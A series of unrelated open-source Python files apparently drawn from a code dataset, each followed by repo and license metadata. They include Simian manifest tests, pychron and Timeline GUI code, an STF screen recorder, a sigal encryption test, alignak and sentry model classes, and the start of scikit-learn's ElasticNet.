mock_plist, owner_mod_one.install_types[1],
owner_mod_one.value, default=[], op=common._ModifyList)
for install_type in common.common.INSTALL_TYPES:
if install_type == 'managed_installs':
mock_plist.get(install_type, []).AndReturn(managed_installs)
mock_plist.__getitem__(install_type).AndReturn(managed_installs)
else:
mock_plist.get(install_type, []).AndReturn([])
mock_plist.GetXml().AndReturn(plist_xml)
self.mox.ReplayAll()
xml_out = common.GenerateDynamicManifest(
plist_xml, client_id, user_settings=user_settings)
self.assertEqual(plist_xml, xml_out)
self.assertTrue(blocked_package_name not in managed_installs)
self.mox.VerifyAll()
def testGenerateDynamicManifestWhenOnlyUserSettingsMods(self):
"""Test GenerateDynamicManifest() when only user_settings mods exist."""
self.mox.StubOutWithMock(common.models, 'SiteManifestModification')
self.mox.StubOutWithMock(common.models, 'OSVersionManifestModification')
self.mox.StubOutWithMock(common.models, 'OwnerManifestModification')
self.mox.StubOutWithMock(common.models, 'UuidManifestModification')
self.mox.StubOutWithMock(common.models, 'TagManifestModification')
self.mox.StubOutWithMock(common.models.db.Key, 'from_path')
self.mox.StubOutWithMock(common.models.Tag, 'GetAllTagNamesForKey')
client_id = {
'site': 'sitex',
'os_version': 'os_versionx',
'owner': 'ownerx',
'uuid': 'uuidx',
'track': 'trackx',
}
blocked_package_name = 'FooPackage'
user_settings = {
'BlockPackages': [blocked_package_name],
'FlashDeveloper': True,
}
plist_xml = '<plist xml>'
common.models.SiteManifestModification.MemcacheWrappedGetAllFilter(
(('site =', client_id['site']),)).AndReturn([])
common.models.OSVersionManifestModification.MemcacheWrappedGetAllFilter(
(('os_version =', client_id['os_version']),)).AndReturn([])
common.models.OwnerManifestModification.MemcacheWrappedGetAllFilter(
(('owner =', client_id['owner']),)).AndReturn([])
common.models.UuidManifestModification.MemcacheWrappedGetAllFilter(
(('uuid =', client_id['uuid']),)).AndReturn([])
common.models.db.Key.from_path('Computer', client_id['uuid']).AndReturn('k')
common.models.Tag.GetAllTagNamesForKey('k').AndReturn(['tag'])
common.models.TagManifestModification.MemcacheWrappedGetAllFilter(
(('tag_key_name =', 'tag'),)).AndReturn([])
managed_installs = [
'FooPkg', blocked_package_name, common.FLASH_PLUGIN_NAME]
managed_updates = []
mock_plist = self.mox.CreateMockAnything()
self.mox.StubOutWithMock(common.plist_module, 'MunkiManifestPlist')
common.plist_module.MunkiManifestPlist(plist_xml).AndReturn(mock_plist)
mock_plist.Parse().AndReturn(None)
# FlashDeveloper is True, so managed_updates and managed_installs are read.
mock_plist.__getitem__(common.common.MANAGED_UPDATES).AndReturn(
managed_updates)
mock_plist.__getitem__(common.common.MANAGED_UPDATES).AndReturn(
managed_installs)
for blocked_pkg in user_settings['BlockPackages']:
for install_type in common.common.INSTALL_TYPES:
if install_type == 'managed_installs':
mock_plist.get(install_type, []).AndReturn(managed_installs)
if blocked_pkg == blocked_package_name:
mock_plist.__getitem__(install_type).AndReturn(managed_installs)
else:
mock_plist.get(install_type, []).AndReturn([])
mock_plist.GetXml().AndReturn(plist_xml)
self.mox.ReplayAll()
xml_out = common.GenerateDynamicManifest(
plist_xml, client_id, user_settings=user_settings)
self.assertEqual(plist_xml, xml_out)
self.assertTrue(blocked_package_name not in managed_installs)
# non-debug flashplugin should be removed from managed_updates
self.assertTrue(common.FLASH_PLUGIN_NAME not in managed_installs)
self.assertTrue(common.FLASH_PLUGIN_DEBUG_NAME in managed_updates)
self.mox.VerifyAll()
def testGenerateDynamicManifestWhenNoMods(self):
"""Test GenerateDynamicManifest() when no manifest mods are available."""
self.mox.StubOutWithMock(common.models, 'SiteManifestModification')
self.mox.StubOutWithMock(common.models, 'OSVersionManifestModification')
self.mox.StubOutWithMock(common.models, 'OwnerManifestModification')
self.mox.StubOutWithMock(common.models, 'UuidManifestModification')
self.mox.StubOutWithMock(common.models.db.Key, 'from_path')
self.mox.StubOutWithMock(common.models.Tag, 'GetAllTagNamesForKey')
client_id = {
'site': 'sitex',
'os_version': 'os_versionx',
'owner': 'ownerx',
'uuid': 'uuidx',
'track': 'trackx',
}
user_settings = None
plist_xml = '<plist xml>'
common.models.SiteManifestModification.MemcacheWrappedGetAllFilter(
(('site =', client_id['site']),)).AndReturn([])
common.models.OSVersionManifestModification.MemcacheWrappedGetAllFilter(
(('os_version =', client_id['os_version']),)).AndReturn([])
common.models.OwnerManifestModification.MemcacheWrappedGetAllFilter(
(('owner =', client_id['owner']),)).AndRaise([])
common.models.UuidManifestModification.MemcacheWrappedGetAllFilter(
(('uuid =', client_id['uuid']),)).AndRaise([])
common.models.db.Key.from_path('Computer', client_id['uuid']).AndReturn('k')
common.models.Tag.GetAllTagNamesForKey('k').AndReturn([])
self.mox.ReplayAll()
self.assertTrue(
common.GenerateDynamicManifest(
plist_xml, client_id, user_settings) is plist_xml)
self.mox.VerifyAll()
def testGetComputerManifest(self):
"""Test ComputerInstallsPending()."""
uuid = 'uuid'
last_notified_datetime = self.mox.CreateMockAnything()
client_id = {
'uuid': 'uuid',
'owner': 'owner',
'hostname': 'hostname',
'serial': 'serial',
'config_track': 'config_track',
'track': 'track',
'site': 'site',
'os_version': 'os_version',
'client_version': 'client_version',
'on_corp': True,
'last_notified_datetime': last_notified_datetime,
'uptime': None,
'root_disk_free': None,
'user_disk_free': None,
}
computer = test.GenericContainer(**client_id)
computer.connections_on_corp = 2
computer.connections_off_corp = 1
computer.user_settings = None
# PackageInfo entities
mock_pl1 = self.mox.CreateMockAnything()
mock_pl2 = self.mox.CreateMockAnything()
mock_pl3 = self.mox.CreateMockAnything()
mock_pl4 = self.mox.CreateMockAnything()
package_infos = [
test.GenericContainer(plist=mock_pl1, version='1.0', name='fooname1'),
test.GenericContainer(plist=mock_pl2, version='1.0', name='fooname2'),
test.GenericContainer(plist=mock_pl3, version='1.0', name='fooname3'),
test.GenericContainer(plist=mock_pl4, version='1.0', name='fooname4'),
]
packagemap = {}
self.mox.StubOutWithMock(common.models, 'Computer')
self.mox.StubOutWithMock(common, 'IsPanicModeNoPackages')
self.mox.StubOutWithMock(common.models, 'Manifest')
self.mox.StubOutWithMock(common, 'GenerateDynamicManifest')
self.mox.StubOutWithMock(common.plist_module, 'MunkiManifestPlist')
self.mox.StubOutWithMock(common.models, 'PackageInfo')
self.mox.StubOutWithMock(common.plist_module, 'MunkiPackageInfoPlist')
# mock manifest creation
common.models.Computer.get_by_key_name(uuid).AndReturn(computer)
common.IsPanicModeNoPackages().AndReturn(False)
mock_plist = self.mox.CreateMockAnything()
common.models.Manifest.MemcacheWrappedGet('track').AndReturn(
test.GenericContainer(enabled=True, plist=mock_plist))
common.GenerateDynamicManifest(
mock_plist, client_id, user_settings=None).AndReturn(
'manifest_plist')
# mock manifest parsing
mock_manifest_plist = self.mox.CreateMockAnything()
common.plist_module.MunkiManifestPlist('manifest_plist').AndReturn(
mock_manifest_plist)
mock_manifest_plist.Parse().AndReturn(None)
# mock manifest reading and package map creation
mock_package_info = self.mox.CreateMockAnything()
common.models.PackageInfo.all().AndReturn(mock_package_info)
iter_return = []
for package_info in package_infos:
iter_return.append(test.GenericContainer(
plist=package_info.plist,
name=package_info.name))
package_info.plist.get('display_name', None).AndReturn(None)
package_info.plist.get('name').AndReturn(package_info.name)
package_info.plist.get('version', '').AndReturn(package_info.version)
packagemap[package_info.name] = '%s-%s' % (
package_info.name, package_info.version)
def __iter_func():
for i in iter_return:
yield i
mock_package_info.__iter__().AndReturn(__iter_func())
manifest_expected = {
'plist': mock_manifest_plist,
'packagemap': packagemap,
}
self.mox.ReplayAll()
manifest = common.GetComputerManifest(uuid=uuid, packagemap=True)
self.assertEqual(manifest, manifest_expected)
self.mox.VerifyAll()
def testGetComputerManifestWhenEmptyDynamic(self):
"""Test ComputerInstallsPending()."""
uuid = 'uuid'
last_notified_datetime = self.mox.CreateMockAnything()
client_id = {
'uuid': 'uuid',
'owner': 'owner',
'hostname': 'hostname',
'serial': 'serial',
'config_track': 'config_track',
'track': 'track',
'site': 'site',
'os_version': 'os_version',
'client_version': 'client_version',
'on_corp': True,
'last_notified_datetime': last_notified_datetime,
'uptime': None,
'root_disk_free': None,
'user_disk_free': None,
}
computer = test.GenericContainer(**client_id)
computer.connections_on_corp = 2
computer.connections_off_corp = 1
computer.user_settings = None
packagemap = {}
self.mox.StubOutWithMock(common.models, 'Computer')
self.mox.StubOutWithMock(common, 'IsPanicModeNoPackages')
self.mox.StubOutWithMock(common.models, 'Manifest')
self.mox.StubOutWithMock(common, 'GenerateDynamicManifest')
self.mox.StubOutWithMock(common.plist_module, 'MunkiManifestPlist')
self.mox.StubOutWithMock(common.models, 'PackageInfo')
self.mox.StubOutWithMock(common.plist_module, 'MunkiPackageInfoPlist')
# mock manifest creation
common.models.Computer.get_by_key_name(uuid).AndReturn(computer)
common.IsPanicModeNoPackages().AndReturn(False)
mock_plist = self.mox.CreateMockAnything()
common.models.Manifest.MemcacheWrappedGet('track').AndReturn(
test.GenericContainer(enabled=True, plist=mock_plist))
common.GenerateDynamicManifest(
mock_plist, client_id, user_settings=None).AndReturn(None)
self.mox.ReplayAll()
self.assertRaises(
common.ManifestNotFoundError,
common.GetComputerManifest, uuid=uuid)
self.mox.VerifyAll()
def testGetComputerManifestWhenManifestNotFound(self):
"""Test ComputerInstallsPending()."""
uuid = 'uuid'
last_notified_datetime = self.mox.CreateMockAnything()
client_id = {
'uuid': 'uuid',
'owner': 'owner',
'hostname': 'hostname',
'serial': 'serial',
'config_track': 'config_track',
'track': 'track',
'site': 'site',
'os_version': 'os_version',
'client_version': 'client_version',
'on_corp': True,
'last_notified_datetime': last_notified_datetime,
'uptime': None,
'root_disk_free': None,
'user_disk_free': None,
}
computer = test.GenericContainer(**client_id)
computer.connections_on_corp = 2
computer.connections_off_corp = 1
computer.user_settings = None
packagemap = {}
self.mox.StubOutWithMock(common.models, 'Computer')
self.mox.StubOutWithMock(common, 'IsPanicModeNoPackages')
self.mox.StubOutWithMock(common.models, 'Manifest')
# mock manifest creation
common.models.Computer.get_by_key_name(uuid).AndReturn(computer)
common.IsPanicModeNoPackages().AndReturn(False)
common.models.Manifest.MemcacheWrappedGet('track').AndReturn(None)
self.mox.ReplayAll()
self.assertRaises(
common.ManifestNotFoundError,
common.GetComputerManifest, uuid=uuid)
self.mox.VerifyAll()
def testGetComputerManifestWhenManifestNotEnabled(self):
"""Test ComputerInstallsPending()."""
uuid = 'uuid'
last_notified_datetime = self.mox.CreateMockAnything()
client_id = {
'uuid': 'uuid',
'owner': 'owner',
'hostname': 'hostname',
'serial': 'serial',
'config_track': 'config_track',
'track': 'track',
'site': 'site',
'os_version': 'os_version',
'client_version': 'client_version',
'on_corp': True,
'last_notified_datetime': last_notified_datetime,
'uptime': None,
'root_disk_free': None,
'user_disk_free': None,
}
computer = test.GenericContainer(**client_id)
computer.connections_on_corp = 2
computer.connections_off_corp = 1
computer.user_settings = None
self.mox.StubOutWithMock(common.models, 'Computer')
self.mox.StubOutWithMock(common, 'IsPanicModeNoPackages')
self.mox.StubOutWithMock(common.models, 'Manifest')
# mock manifest creation
common.models.Computer.get_by_key_name(uuid).AndReturn(computer)
common.IsPanicModeNoPackages().AndReturn(False)
common.models.Manifest.MemcacheWrappedGet('track').AndReturn(
test.GenericContainer(enabled=False, plist='manifest_plist'))
self.mox.ReplayAll()
self.assertRaises(
common.ManifestDisabledError,
common.GetComputerManifest, uuid=uuid)
self.mox.VerifyAll()
def testGetComputerManifestIsPanicMode(self):
"""Test ComputerInstallsPending()."""
uuid = 'uuid'
last_notified_datetime = self.mox.CreateMockAnything()
client_id = {
'uuid': 'uuid',
'owner': 'owner',
'hostname': 'hostname',
'serial': 'serial',
'config_track': 'config_track',
'track': 'track',
'site': 'site',
'os_version': 'os_version',
'client_version': 'client_version',
'on_corp': True,
'last_notified_datetime': last_notified_datetime,
'uptime': None,
'root_disk_free': None,
'user_disk_free': None,
}
computer = test.GenericContainer(**client_id)
computer.connections_on_corp = 2
computer.connections_off_corp = 1
computer.user_settings = None
self.mox.StubOutWithMock(common.models, 'Computer')
self.mox.StubOutWithMock(common, 'IsPanicModeNoPackages')
common.models.Computer.get_by_key_name(uuid).AndReturn(computer)
common.IsPanicModeNoPackages().AndReturn(True)
manifest_expected = '%s%s' % (
common.plist_module.PLIST_HEAD,
common.plist_module.PLIST_FOOT)
self.mox.ReplayAll()
manifest = common.GetComputerManifest(uuid=uuid)
self.assertEqual(manifest, manifest_expected)
self.mox.VerifyAll()
def testGetComputerManifestWhenNoBadArgs(self):
"""Test GetComputerManifest()."""
self.mox.ReplayAll()
# missing args
self.assertRaises(ValueError, common.GetComputerManifest)
# missing args
self.assertRaises(ValueError, common.GetComputerManifest, packagemap=True)
# client_id should be a dict
self.assertRaises(ValueError, common.GetComputerManifest, client_id=1)
self.mox.VerifyAll()
def testGetComputerManifestWhenNoComputer(self):
"""Test GetComputerManifest()."""
uuid = 'uuid'
self.mox.StubOutWithMock(common.models, 'Computer')
# mock manifest creation
common.models.Computer.get_by_key_name(uuid).AndReturn(None)
self.mox.ReplayAll()
self.assertRaises(
common.ComputerNotFoundError,
common.GetComputerManifest,
uuid=uuid)
self.mox.VerifyAll()
logging.basicConfig(filename='/dev/null')
def main(unused_argv):
test.main(unused_argv)
if __name__ == '__main__':
app.run()
| apache-2.0 | 4,636,566,650,788,164,000 | 37.957895 | 80 | 0.683641 | false |
NMGRL/pychron | pychron/gis/views.py | 1 | 2459 | # ===============================================================================
# Copyright 2020 ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
from traitsui.api import View, Item, UItem, HGroup, Heading, spring, FileEditor
from traitsui.editors import InstanceEditor, ListEditor
from traitsui.group import VGroup
from pychron.core.pychron_traits import BorderVGroup
from pychron.options.options import SubOptions, GroupSubOptions as _GroupSubOptions
from pychron.paths import paths
from pychron.pychron_constants import MAIN
class MainView(SubOptions):
def traits_view(self):
v = View(BorderVGroup(Item('basemap_uri_template', label='Base Map URI'),
label='Web Map Services'),
HGroup(spring, Heading('or'), spring),
BorderVGroup(Item('basemap_path', editor=FileEditor(root_path=paths.data_dir)),
label='Local Raster'),
UItem('basemap_uri', style='custom'))
return v
# class AppearanceView(SubOptions):
# def traits_view(self):
# v = View(BorderVGroup(Item('symbol_size'),
# Item('symbol_kind'),
# Item('symbol_color')))
# return v
class GroupSubOptions(_GroupSubOptions):
def traits_view(self):
g = self._make_group()
return self._make_view(g)
class LayersSubOptions(SubOptions):
def traits_view(self):
v = View(VGroup(HGroup(UItem('add_layer_button')),
UItem('layers', editor=ListEditor(mutable=True, style='custom',
editor=InstanceEditor()))))
return v
VIEWS = {MAIN.lower(): MainView,
'groups': GroupSubOptions,
'layers': LayersSubOptions}
# ============= EOF =============================================
| apache-2.0 | -7,972,781,191,736,847,000 | 36.830769 | 96 | 0.583571 | false |
linostar/timeline-clone | source/timelinelib/wxgui/component.py | 1 | 2662 | # Copyright (C) 2009, 2010, 2011 Rickard Lindberg, Roger Lindberg
#
# This file is part of Timeline.
#
# Timeline is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Timeline is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Timeline. If not, see <http://www.gnu.org/licenses/>.
import wx
from timelinelib.db import db_open
from timelinelib.wxgui.components.timeline import TimelinePanel
class DummyConfig(object):
def __init__(self):
self.window_size = (100, 100)
self.window_pos = (100, 100)
self.window_maximized = False
self.show_sidebar = True
self.show_legend = True
self.sidebar_width = 200
self.recently_opened = []
self.open_recent_at_startup = False
self.balloon_on_hover = True
self.week_start = "monday"
self.use_inertial_scrolling = False
def get_sidebar_width(self):
return self.sidebar_width
def get_show_sidebar(self):
return self.show_sidebar
def get_show_legend(self):
return self.show_legend
def get_balloon_on_hover(self):
return self.balloon_on_hover
class DummyStatusBarAdapter(object):
def set_text(self, text):
pass
def set_hidden_event_count_text(self, text):
pass
def set_read_only_text(self, text):
pass
class DummyMainFrame(object):
def enable_disable_menus(self):
pass
def edit_ends(self):
pass
def ok_to_edit(self):
return False
class TimelineComponent(TimelinePanel):
def __init__(self, parent):
TimelinePanel.__init__(
self, parent, DummyConfig(), self.handle_db_error,
DummyStatusBarAdapter(), DummyMainFrame())
self.activated()
def handle_db_error(self, e):
pass
def open_timeline(self, path):
timeline = db_open(path)
self.timeline_canvas.set_timeline(timeline)
self.sidebar.category_tree.set_timeline_view(
self.timeline_canvas.get_timeline(),
self.timeline_canvas.get_view_properties()
)
def clear_timeline(self):
self.timeline_canvas.set_timeline(None)
self.sidebar.category_tree.set_no_timeline_view()
| gpl-3.0 | 7,427,410,965,997,319,000 | 26.163265 | 70 | 0.661533 | false |
2gis/stf-utils | stf_utils/stf_record/protocol.py | 1 | 2324 | import time
import logging
from autobahn.asyncio.websocket import WebSocketClientProtocol
log = logging.getLogger(__name__)
class STFRecordProtocol(WebSocketClientProtocol):
img_directory = None
address = None
resolution = None
def __init__(self):
super().__init__()
self.first_msg_timestamp = None
self.previous_msg_timestamp = None
self.current_msg_timestamp = None
def _construct_img_filename(self):
img_filename = "{0}.jpg".format(
self.current_msg_timestamp - self.first_msg_timestamp
)
return img_filename
@staticmethod
def _write_image_file(img_filename, binary_data):
with open(img_filename, 'bw+') as file:
log.debug('Writing image data to file {0}'.format(file.name))
file.write(binary_data)
def _write_metadata(self, img_filename):
metadata_filename = "{0}/input.txt".format(self.img_directory)
m_file = open(metadata_filename, 'a')
log.debug('Appending image metadata to file {0}'.format(m_file.name))
if self.previous_msg_timestamp is not None:
duration = self.current_msg_timestamp - self.previous_msg_timestamp
m_file.write("duration {0}\n".format(duration))
m_file.write("file '{0}'\n".format(img_filename))
m_file.close()
def save_data_and_metadata(self, binary_data):
img_filename = self._construct_img_filename()
self._write_image_file("{0}/{1}".format(self.img_directory, img_filename), binary_data)
self._write_metadata(img_filename)
def onOpen(self):
log.debug('Starting receive binary data')
if self.resolution:
self.sendMessage(self.resolution.encode('ascii'))
self.sendMessage('on'.encode('ascii'))
def onMessage(self, payload, isBinary):
if isBinary:
self.current_msg_timestamp = time.time()
if self.previous_msg_timestamp is None:
self.first_msg_timestamp = self.current_msg_timestamp
self.save_data_and_metadata(payload)
self.previous_msg_timestamp = self.current_msg_timestamp
def onClose(self, wasClean, code, reason):
log.debug('Disconnecting {0} ...'.format(self.address))
self.sendMessage('off'.encode('ascii'))
| mit | 4,412,727,215,913,162,000 | 36.483871 | 95 | 0.636403 | false |
dls-controls/pymalcolm | tests/test_modules/test_builtin/test_basiccontroller.py | 1 | 1213 | import unittest
from malcolm.core import Alarm, AlarmSeverity, Process
from malcolm.modules.builtin.controllers import BasicController
from malcolm.modules.builtin.infos import HealthInfo
class TestBasicController(unittest.TestCase):
def setUp(self):
self.process = Process("proc")
self.o = BasicController("MyMRI")
self.process.add_controller(self.o)
self.process.start()
self.b = self.process.block_view("MyMRI")
def tearDown(self):
self.process.stop(timeout=2)
def update_health(self, num, alarm=Alarm.ok):
self.o.update_health(num, HealthInfo(alarm))
def test_set_health(self):
self.update_health(1, Alarm(severity=AlarmSeverity.MINOR_ALARM))
self.update_health(2, Alarm(severity=AlarmSeverity.MAJOR_ALARM))
assert self.b.health.alarm.severity == AlarmSeverity.MAJOR_ALARM
self.update_health(1, Alarm(severity=AlarmSeverity.UNDEFINED_ALARM))
self.update_health(2, Alarm(severity=AlarmSeverity.INVALID_ALARM))
assert self.b.health.alarm.severity == AlarmSeverity.UNDEFINED_ALARM
self.update_health(1)
self.update_health(2)
assert self.o.health.value == "OK"
| apache-2.0 | 2,259,333,449,535,143,000 | 35.757576 | 76 | 0.700742 | false |
kontza/sigal | tests/test_encrypt.py | 1 | 2796 | import os
import pickle
from io import BytesIO
from sigal import init_plugins
from sigal.gallery import Gallery
from sigal.plugins.encrypt import endec
from sigal.plugins.encrypt.encrypt import cache_key
CURRENT_DIR = os.path.dirname(__file__)
def get_key_tag(settings):
options = settings["encrypt_options"]
key = endec.kdf_gen_key(
options["password"],
options["kdf_salt"],
options["kdf_iters"]
)
tag = options["gcm_tag"].encode("utf-8")
return (key, tag)
def test_encrypt(settings, tmpdir, disconnect_signals):
settings['destination'] = str(tmpdir)
if "sigal.plugins.encrypt" not in settings["plugins"]:
settings['plugins'] += ["sigal.plugins.encrypt"]
settings['encrypt_options'] = {
'password': 'password',
'ask_password': True,
'gcm_tag': 'AuTheNTiCatIoNtAG',
'kdf_salt': 'saltysaltsweetysweet',
'kdf_iters': 10000,
'encrypt_symlinked_originals': False
}
init_plugins(settings)
gal = Gallery(settings)
gal.build()
# check the encrypt cache exists
cachePath = os.path.join(settings["destination"], ".encryptCache")
assert os.path.isfile(cachePath)
encryptCache = None
with open(cachePath, "rb") as cacheFile:
encryptCache = pickle.load(cacheFile)
assert isinstance(encryptCache, dict)
testAlbum = gal.albums["encryptTest"]
key, tag = get_key_tag(settings)
for media in testAlbum:
# check if sizes are stored in cache
assert cache_key(media) in encryptCache
assert "size" in encryptCache[cache_key(media)]
assert "thumb_size" in encryptCache[cache_key(media)]
assert "encrypted" in encryptCache[cache_key(media)]
encryptedImages = [
media.dst_path,
media.thumb_path
]
if settings["keep_orig"]:
encryptedImages.append(os.path.join(settings["destination"],
media.path, media.big))
# check if images are encrypted by trying to decrypt
for image in encryptedImages:
with open(image, "rb") as infile:
with BytesIO() as outfile:
endec.decrypt(key, infile, outfile, tag)
# check static files have been copied
static = os.path.join(settings["destination"], 'static')
assert os.path.isfile(os.path.join(static, "decrypt.js"))
assert os.path.isfile(os.path.join(static, "keycheck.txt"))
assert os.path.isfile(os.path.join(settings["destination"], "sw.js"))
# check keycheck file
with open(os.path.join(settings["destination"],
'static', "keycheck.txt"), "rb") as infile:
with BytesIO() as outfile:
endec.decrypt(key, infile, outfile, tag)
| mit | 7,785,521,272,187,205,000 | 32.285714 | 73 | 0.629471 | false |
mohierf/bottle-webui | alignak_webui/objects/item_hostgroup.py | 1 | 3392 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Many functions need to use protected members of a base class
# pylint: disable=protected-access
# Attributes need to be defined in constructor before initialization
# pylint: disable=attribute-defined-outside-init
# Copyright (c) 2015-2017:
# Frederic Mohier, [email protected]
#
# This file is part of (WebUI).
#
# (WebUI) is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# (WebUI) is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with (WebUI). If not, see <http://www.gnu.org/licenses/>.
"""
This module contains the classes used to manage the application objects with the data manager.
"""
from alignak_webui.objects.element import BackendElement
class HostGroup(BackendElement):
"""
Object representing a hostgroup
"""
_count = 0
# Next value used for auto generated id
_next_id = 1
# _type stands for Backend Object Type
_type = 'hostgroup'
# _cache is a list of created objects
_cache = {}
# Converting real state identifier to text status
overall_state_to_status = [
'ok', 'acknowledged', 'in_downtime', 'warning', 'critical'
]
def __init__(self, params=None, date_format='%a, %d %b %Y %H:%M:%S %Z', embedded=True):
"""
Create a hostgroup (called only once when an object is newly created)
"""
self._linked_hostgroups = 'hostgroup'
self._linked__parent = 'hostgroup'
self._linked_hosts = 'host'
super(HostGroup, self).__init__(params, date_format, embedded)
if not hasattr(self, '_overall_state'):
setattr(self, '_overall_state', 0)
@property
def members(self):
""" Return linked object """
return self._linked_hosts
@property
def hosts(self):
""" Return linked object """
return self._linked_hosts
@property
def hostgroups(self):
""" Return linked object """
return self._linked_hostgroups
@property
def _parent(self):
""" Return group parent """
return self._linked__parent
@property
def level(self):
""" Return group level """
if not hasattr(self, '_level'):
return -1
return self._level
# @property
# def status(self):
# """Return real status string from the real state identifier"""
# return self.overall_state
#
# @property
# def overall_state(self):
# """Return real state identifier"""
# return self._overall_state
#
# @overall_state.setter
# def overall_state(self, overall_state):
# """
# Set Item object overall_state
# """
# self._overall_state = overall_state
#
# @property
# def overall_status(self):
# """Return real status string from the real state identifier"""
# return self.overall_state_to_status[self._overall_state]
| agpl-3.0 | -7,640,984,566,309,661,000 | 30.119266 | 98 | 0.637972 | false |
mitsuhiko/sentry | src/sentry/db/models/base.py | 1 | 3272 | """
sentry.db.models
~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
import logging
from django.db import models
from django.db.models import signals
from .fields.bounded import BoundedBigAutoField
from .manager import BaseManager
from .query import update
__all__ = ('BaseModel', 'Model', 'sane_repr')
UNSAVED = object()
def sane_repr(*attrs):
if 'id' not in attrs and 'pk' not in attrs:
attrs = ('id',) + attrs
def _repr(self):
cls = type(self).__name__
pairs = (
'%s=%s' % (a, repr(getattr(self, a, None)))
for a in attrs)
return u'<%s at 0x%x: %s>' % (cls, id(self), ', '.join(pairs))
return _repr
class BaseModel(models.Model):
class Meta:
abstract = True
objects = BaseManager()
update = update
def __init__(self, *args, **kwargs):
super(BaseModel, self).__init__(*args, **kwargs)
self._update_tracked_data()
def __getstate__(self):
d = self.__dict__.copy()
# we cant serialize weakrefs
d.pop('_Model__data', None)
return d
def __reduce__(self):
(model_unpickle, stuff, _) = super(BaseModel, self).__reduce__()
return (model_unpickle, stuff, self.__getstate__())
def __setstate__(self, state):
self.__dict__.update(state)
self._update_tracked_data()
def __get_field_value(self, field):
if isinstance(field, models.ForeignKey):
return getattr(self, field.column, None)
return getattr(self, field.name, None)
def _update_tracked_data(self):
"Updates a local copy of attributes values"
if self.id:
data = {}
for f in self._meta.fields:
try:
data[f.column] = self.__get_field_value(f)
except AttributeError as e:
# this case can come up from pickling
logging.exception(unicode(e))
self.__data = data
else:
self.__data = UNSAVED
def has_changed(self, field_name):
"Returns ``True`` if ``field`` has changed since initialization."
if self.__data is UNSAVED:
return False
field = self._meta.get_field(field_name)
return self.__data.get(field_name) != self.__get_field_value(field)
def old_value(self, field_name):
"Returns the previous value of ``field``"
if self.__data is UNSAVED:
return None
return self.__data.get(field_name)
class Model(BaseModel):
id = BoundedBigAutoField(primary_key=True)
class Meta:
abstract = True
__repr__ = sane_repr('id')
def __model_post_save(instance, **kwargs):
if not isinstance(instance, BaseModel):
return
instance._update_tracked_data()
def __model_class_prepared(sender, **kwargs):
if not issubclass(sender, BaseModel):
return
if not hasattr(sender, '__core__'):
raise ValueError('{!r} model has not defined __core__'.format(sender))
signals.post_save.connect(__model_post_save)
signals.class_prepared.connect(__model_class_prepared)
| bsd-3-clause | 4,136,426,230,593,140,000 | 25.387097 | 78 | 0.585269 | false |
florian-f/sklearn | sklearn/linear_model/coordinate_descent.py | 1 | 47058 | # Author: Alexandre Gramfort <[email protected]>
# Fabian Pedregosa <[email protected]>
# Olivier Grisel <[email protected]>
# Gael Varoquaux <[email protected]>
#
# License: BSD Style.
import sys
import warnings
import itertools
import operator
from abc import ABCMeta, abstractmethod
import numpy as np
from scipy import sparse
from .base import LinearModel
from ..base import RegressorMixin
from .base import sparse_center_data, center_data
from ..utils import array2d, atleast2d_or_csc, deprecated
from ..cross_validation import check_cv
from ..externals.joblib import Parallel, delayed
from ..externals.six.moves import xrange
from ..utils.extmath import safe_sparse_dot
from . import cd_fast
###############################################################################
# ElasticNet model
class ElasticNet(LinearModel, RegressorMixin):
"""Linear Model trained with L1 and L2 prior as regularizer
Minimizes the objective function::
1 / (2 * n_samples) * ||y - Xw||^2_2 +
+ alpha * l1_ratio * ||w||_1
+ 0.5 * alpha * (1 - l1_ratio) * ||w||^2_2
If you are interested in controlling the L1 and L2 penalty
separately, keep in mind that this is equivalent to::
a * L1 + b * L2
where::
alpha = a + b and l1_ratio = a / (a + b)
The parameter l1_ratio corresponds to alpha in the glmnet R package while
alpha corresponds to the lambda parameter in glmnet. Specifically, l1_ratio
= 1 is the lasso penalty. Currently, l1_ratio <= 0.01 is not reliable,
unless you supply your own sequence of alpha.
Parameters
----------
alpha : float
Constant that multiplies the penalty terms. Defaults to 1.0
See the notes for the exact mathematical meaning of this
parameter.
``alpha = 0`` is equivalent to an ordinary least square, solved
by the :class:`LinearRegression` object. For numerical
reasons, using ``alpha = 0`` with the Lasso object is not advised
and you should prefer the LinearRegression object.
l1_ratio : float
The ElasticNet mixing parameter, with ``0 <= l1_ratio <= 1``. For
``l1_ratio = 0`` the penalty is an L2 penalty. ``For l1_ratio = 1`` it
is an L1 penalty. For ``0 < l1_ratio < 1``, the penalty is a
combination of L1 and L2.
fit_intercept: bool
Whether the intercept should be estimated or not. If ``False``, the
data is assumed to be already centered.
normalize : boolean, optional, default False
If ``True``, the regressors X will be normalized before regression.
precompute : True | False | 'auto' | array-like
Whether to use a precomputed Gram matrix to speed up
calculations. If set to ``'auto'`` let us decide. The Gram
matrix can also be passed as argument. For sparse input
this option is always ``True`` to preserve sparsity.
max_iter: int, optional
The maximum number of iterations
copy_X : boolean, optional, default False
If ``True``, X will be copied; else, it may be overwritten.
tol: float, optional
The tolerance for the optimization: if the updates are
smaller than ``tol``, the optimization code checks the
dual gap for optimality and continues until it is smaller
than ``tol``.
warm_start : bool, optional
